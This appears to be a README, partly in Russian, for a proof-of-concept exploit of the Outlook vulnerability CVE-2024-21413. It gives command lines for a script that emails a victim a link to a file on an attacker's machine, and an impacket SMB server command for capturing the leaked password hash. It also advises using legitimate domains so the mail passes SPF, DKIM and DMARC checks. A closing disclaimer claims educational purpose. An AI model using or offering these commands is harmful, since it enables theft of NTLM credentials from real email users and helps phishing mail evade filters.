
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - CVE-2024-21413 POC
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf
[!NOTE] r00tb1t : это общий тестовый файл (в данном случае word) с машины атакующего (xx.xx.xx.xx).
Для обеспечения соответствия SPF, DKIM и DMARC используйте легитимные $IP и домен.
Убедитесь, что вы установили библиотеку pexpect, если еще не установили, используя
pip install pexpect.
impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf
- Kudooooos и подробности о CVE-2024-21413 .
- Обходное решение/Исправление:
[!CAUTION] ⚠️ Отказ от ответственности: ВАЖНО: Этот скрипт предоставляется ТОЛЬКО для образовательных целей, этического тестирования и законного использования. Не используйте его на любой системе или сети без явного разрешения. Несанкционированный доступ к компьютерным системам и сетям является незаконным, и пользователи, пойманные за выполнением несанкционированных действий, подлежат судебному преследованию. Автор НЕ несет ответственности за любой ущерб, вызванный неправильным использованием этого скрипта..